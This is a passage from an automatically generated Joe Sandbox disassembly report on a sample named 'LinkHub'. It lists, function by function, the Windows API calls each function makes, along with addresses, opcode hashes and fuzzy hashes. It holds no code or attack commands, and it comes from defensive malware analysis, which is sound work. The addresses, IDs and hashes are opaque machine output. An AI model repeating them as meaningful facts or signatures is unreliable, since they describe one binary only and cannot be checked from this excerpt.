                                                                      • Part of subcall function 00C93614: RaiseException.KERNEL32(?,?,?,00C909FA,74DE2E40,?,?,?,?,?,?,?,00C909FA,?,00D39758), ref: 00C93674
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00C909F5
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: dc604efe6b038f90e1980580da221e5f4d1748d5506d2c6db306bc4fdcf2a100
                                                                    • Instruction ID: c378ec8d32e5204fdd018fb763e34a9cbcb3b85f7a4c69f8520f30fc3db024fd
                                                                    • Opcode Fuzzy Hash: dc604efe6b038f90e1980580da221e5f4d1748d5506d2c6db306bc4fdcf2a100
                                                                    • Instruction Fuzzy Hash: E7F0C23490060CBF8F00BBA5EC5E89E777C5F01350B704120B924965E2FB71EB5AD6D0
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00CF8D52
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00CF8D59
                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00CF8F3A
                                                                    Similarity
                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                    • String ID:
                                                                    • API String ID: 146820519-0
                                                                    • Opcode ID: 0aa70967bab20d657dba86b61fdb86f7b1dcd57c9314e8ef07ad69d3fd79aea9
                                                                    • Instruction ID: 71b9a41d714c5af05f53dd96a1da620b3e07365879cfb623ac697811f41517cf
                                                                    • Opcode Fuzzy Hash: 0aa70967bab20d657dba86b61fdb86f7b1dcd57c9314e8ef07ad69d3fd79aea9
                                                                    • Instruction Fuzzy Hash: C5127C71A083459FC754DF24C484B6ABBE5FF88318F14895DE9998B392CB30ED49CB92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_strcat
                                                                    • String ID:
                                                                    • API String ID: 306214811-0
                                                                    • Opcode ID: 0ae162324a00144ef8560ffba80bc7c3b12273dff2c7652b2ceee98737fbf186
                                                                    • Instruction ID: f161b1883746ee56c2d82dec1d96a76890e4afcf39788aa93e9f23a24cba2495
                                                                    • Opcode Fuzzy Hash: 0ae162324a00144ef8560ffba80bc7c3b12273dff2c7652b2ceee98737fbf186
                                                                    • Instruction Fuzzy Hash: 56A16C31600609EFCF18DF19D5D1AA9B7E1FF45314B2084ADE91A8F292DB31ED42DB81
                                                                    APIs
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C732AF
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C732B7
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C732C2
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C732CD
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C732D5
                                                                      • Part of subcall function 00C7327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C732DD
                                                                      • Part of subcall function 00C73205: RegisterWindowMessageW.USER32(00000004,?,00C72964), ref: 00C7325D
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C72A0A
                                                                    • OleInitialize.OLE32 ref: 00C72A28
                                                                    • CloseHandle.KERNELBASE(00000000,00000000), ref: 00CB3A0D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    • Opcode ID: d2d1d3d25a5d60f3a2f915e160c52d7bc8c7e21f4e41a1b63530e6853dd3b6f0
                                                                    • Instruction ID: cc8eb196f34eb2436bfd9fd5c4e6224cbd23c94c67b84476e37f4a49cadece22
                                                                    • Opcode Fuzzy Hash: d2d1d3d25a5d60f3a2f915e160c52d7bc8c7e21f4e41a1b63530e6853dd3b6f0
                                                                    • Instruction Fuzzy Hash: 627156B89113448FC788EFB9AD696393AF1FB9A3147D0812AB00DC73A2EB7045419F74
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,00CA894C,?,00D39CE8,0000000C), ref: 00CA8A84
                                                                    • GetLastError.KERNEL32(?,00CA894C,?,00D39CE8,0000000C), ref: 00CA8A8E
                                                                    • __dosmaperr.LIBCMT ref: 00CA8AB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2583163307-0
                                                                    • Opcode ID: de7c1f20760b6dd8eb82da8d9a46be6c6ed892840b7f050bd9102ae458e81d30
                                                                    • Instruction ID: b9405d3672c8feadff543b00b93485ebd3f049ed42b8ba8c82df0ae829ec7dbd
                                                                    • Opcode Fuzzy Hash: de7c1f20760b6dd8eb82da8d9a46be6c6ed892840b7f050bd9102ae458e81d30
                                                                    • Instruction Fuzzy Hash: 130126336156625BCB246274AC46B7E67495B8373CF29021BF938DB2D2DF308EC9B190
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00CA97BA,FF8BC369,00000000,00000002,00000000), ref: 00CA9744
                                                                    • GetLastError.KERNEL32(?,00CA97BA,FF8BC369,00000000,00000002,00000000,?,00CA5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00C96F41), ref: 00CA974E
                                                                    • __dosmaperr.LIBCMT ref: 00CA9755
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2336955059-0
                                                                    • Opcode ID: 13b33566252c294cf5873d1ecb66fde1d386764441cdcc21c55d64d2cf6d93e1
                                                                    • Instruction ID: 7e1901d5c7b381d7db8c1210534779422365fe4a055e7a33284509fcbb1038d7
                                                                    • Opcode Fuzzy Hash: 13b33566252c294cf5873d1ecb66fde1d386764441cdcc21c55d64d2cf6d93e1
                                                                    • Instruction Fuzzy Hash: C6014037630615ABCF059F99DC06C6F371ADB86334B240209F811D7290EA30DE81D7B0
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00CE0B03,00000000,?,00000000,?,00CB3A00,00000000), ref: 00CE0D2E
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00CE0B03,00000000,?,00000000,?,00CB3A00,00000000), ref: 00CE0D36
                                                                    • DuplicateHandle.KERNELBASE(00000000,?,00CE0B03,00000000,?,00000000,?,00CB3A00,00000000), ref: 00CE0D3D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcess$DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 1294930198-0
                                                                    • Opcode ID: 3c48275c5a67420c8ebf85f2e9f747bde5f0696b907ad464ba45fe34ee6901bc
                                                                    • Instruction ID: 3229c189ebe2f9afdbd727aadaa97157b0edcb3328ea278f824cad28a16839c4
                                                                    • Opcode Fuzzy Hash: 3c48275c5a67420c8ebf85f2e9f747bde5f0696b907ad464ba45fe34ee6901bc
                                                                    • Instruction Fuzzy Hash: 9AD05E77140306BBC7021BD6EC09F3B7B7EDBC6B22F20401AF60DC62509AB0A6409772
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 00C83006
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID: CALL
                                                                    • API String ID: 1385522511-4196123274
                                                                    • Opcode ID: f8092a7c0c7c51f967b6b5fa9e987869dfa524de091ae650f83d8f7b611d83b6
                                                                    • Instruction ID: 97a3da6e915ea9194098b2de72a9f5f9d5bf8ae8bf3da6dc399d9d15230d0495
                                                                    • Opcode Fuzzy Hash: f8092a7c0c7c51f967b6b5fa9e987869dfa524de091ae650f83d8f7b611d83b6
                                                                    • Instruction Fuzzy Hash: 07228B706082419FC714EF25C888B2ABBF1FF94318F24895DF49A8B3A1D771EA41DB56
                                                                    APIs
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00CB413B
                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                      • Part of subcall function 00C73A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C73A76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                    • String ID: X
                                                                    • API String ID: 779396738-3081909835
                                                                    • Opcode ID: 4838582e8c69f54b390c0bb4c3de6983ce06b253fd6c27495cd2be4c61715903
                                                                    • Instruction ID: 5a18723694af494991db2d8192bb4e509611a37a66b38cbfe5698ec4cde53b5e
                                                                    • Opcode Fuzzy Hash: 4838582e8c69f54b390c0bb4c3de6983ce06b253fd6c27495cd2be4c61715903
                                                                    • Instruction Fuzzy Hash: 3A21F370A002589BCB11DF94C806BEE7BFCAF48310F008019E448A7381DBF49A89AFA1
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE ref: 00C9007D
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C9008F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 3280610774-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: a1104c4cae1007d566615145b23c4ed76b73451ee9aea87c830c0af22c76cb23
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 4731D270A00105DFCB18CF59D488A69FBB6FB49300B34A6A5E41ACB252D732EEC1CBC0
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C73A3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    • Opcode ID: d7b3657d9676a3a09e74877aadb5bc59a15dcbe37d531b725296bd7c3a47078b
                                                                    • Instruction ID: 16ff0398e78638782de16977cb1311f47f9b2b7687087dcdc5ee40fa2c0e5f8f
                                                                    • Opcode Fuzzy Hash: d7b3657d9676a3a09e74877aadb5bc59a15dcbe37d531b725296bd7c3a47078b
                                                                    • Instruction Fuzzy Hash: 0F316D705047019FD320DF64D8897A7BBF8BB49718F00092EF6D987341E775AA48DB52
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00CA4F04
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00CA4F16
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleType
                                                                    • String ID:
                                                                    • API String ID: 3000768030-0
                                                                    • Opcode ID: 43899902529d45d9aa7481b1889c114502ff4d9746b65b8e4dddc1b9635ae8bc
                                                                    • Instruction ID: 3a4c91d8005e3adf6ef530c9251627c87a074abe9b696ba3fb7f88917d2ccd0b
                                                                    • Opcode Fuzzy Hash: 43899902529d45d9aa7481b1889c114502ff4d9746b65b8e4dddc1b9635ae8bc
                                                                    • Instruction Fuzzy Hash: 90110A351047434EC7388EBE9C88622BA95A7D7338B38171AD5B6C31F1D7B0DE829250
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00CB3A00,00000000), ref: 00CE0AEC
                                                                    • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00CE0B0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                    • String ID:
                                                                    • API String ID: 4104817828-0
                                                                    • Opcode ID: 36f528e2bac1e07fb03026cebd9d10c5264ba60f3f72b9ae4c6345c437def45d
                                                                    • Instruction ID: d9a9cf170e0caf1a8445fd904e2f804a6edca931c1b86e4bbfd23aa4c02fb7c8
                                                                    • Opcode Fuzzy Hash: 36f528e2bac1e07fb03026cebd9d10c5264ba60f3f72b9ae4c6345c437def45d
                                                                    • Instruction Fuzzy Hash: 91F012B15007059BC320DF5AD9449A7FBECFF94720B40882EE48A87A20CBB4B085CBA0
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00C7333D
                                                                      • Part of subcall function 00C732E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C732FB
                                                                      • Part of subcall function 00C732E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C73312
                                                                      • Part of subcall function 00C7338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C73368,?), ref: 00C733BB
                                                                      • Part of subcall function 00C7338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C73368,?), ref: 00C733CE
                                                                      • Part of subcall function 00C7338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D42418,00D42400,?,?,?,?,?,?,00C73368,?), ref: 00C7343A
                                                                      • Part of subcall function 00C7338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00D42418,?,?,?,?,?,?,?,00C73368,?), ref: 00C734BB
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00C73377
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                    • String ID:
                                                                    • API String ID: 1550534281-0
                                                                    • Opcode ID: 20be68536ee119bc04d58724f999a3e310b147217d74487618bd20ecbc72b7e6
                                                                    • Instruction ID: 5accb3af8fdb98648cef70a9d912dceb8d39b305351a5b788366a08d4140beaa
                                                                    • Opcode Fuzzy Hash: 20be68536ee119bc04d58724f999a3e310b147217d74487618bd20ecbc72b7e6
                                                                    • Instruction Fuzzy Hash: 2DF054755547849FD7116F60EC0EB7437A4A702709F54481AF90DC52F2CBB99191AB70
                                                                    APIs
                                                                      • Part of subcall function 00CE1312: InterlockedExchange.KERNEL32(?,?), ref: 00CE1322
                                                                      • Part of subcall function 00CE1312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00CE1334
                                                                      • Part of subcall function 00CE1312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00CE1342
                                                                      • Part of subcall function 00CE1312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00CE1350
                                                                      • Part of subcall function 00CE1312: CloseHandle.KERNEL32(00000000), ref: 00CE135F
                                                                      • Part of subcall function 00CE1312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE136F
                                                                      • Part of subcall function 00CE1312: LeaveCriticalSection.KERNEL32(00000000), ref: 00CE1376
                                                                    • CloseHandle.KERNELBASE(?,?,00CE0BBF), ref: 00CE0B5D
                                                                    • DeleteCriticalSection.KERNEL32(?,?,00CE0BBF), ref: 00CE0B83
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2929296749-0
                                                                    • Opcode ID: 517762a14c95ec198a41b2652d30f846358ee853eeb8ceea588fbde06eb909ad
                                                                    • Instruction ID: f314a8ede96eba03c251c6e1479f11ba6403048de4c1f9047391ab527c9ee4e9
                                                                    • Opcode Fuzzy Hash: 517762a14c95ec198a41b2652d30f846358ee853eeb8ceea588fbde06eb909ad
                                                                    • Instruction Fuzzy Hash: E6E01A720007119FCB306F65E809A86BBE5BF14325F34885EE49A95A31CB70A8849B54
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 00C7CEEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID:
                                                                    • API String ID: 1385522511-0
                                                                    • Opcode ID: c58fc329c0944423540d52a8c7d8d5300ab67a8b50eb8be2935070f513a6c042
                                                                    • Instruction ID: 8b67fa95e9a6cfd81dad512dc154cb7656dbb4970b29107bbd3bc3763c8ecdd6
                                                                    • Opcode Fuzzy Hash: c58fc329c0944423540d52a8c7d8d5300ab67a8b50eb8be2935070f513a6c042
                                                                    • Instruction Fuzzy Hash: CE328E75A002069FDB20DF59C884FBAB7B5EF45354F18805DED2AAB252C734EE41DB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString
                                                                    • String ID:
                                                                    • API String ID: 2948472770-0
                                                                    • Opcode ID: f48b290f3f8e02e05a188ddf2fa335cacb10fd61d08c04947a299cf9a8f94561
                                                                    • Instruction ID: 01a40744a5247cf506cac5297c5feb97aea7fb23c554dc53566f3657102064ef
                                                                    • Opcode Fuzzy Hash: f48b290f3f8e02e05a188ddf2fa335cacb10fd61d08c04947a299cf9a8f94561
                                                                    • Instruction Fuzzy Hash: 51D15C74A04209DFCB14EF99C8819FDBBB5FF58310F14815AEA15AB391DB30AE91CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                     • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                     • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
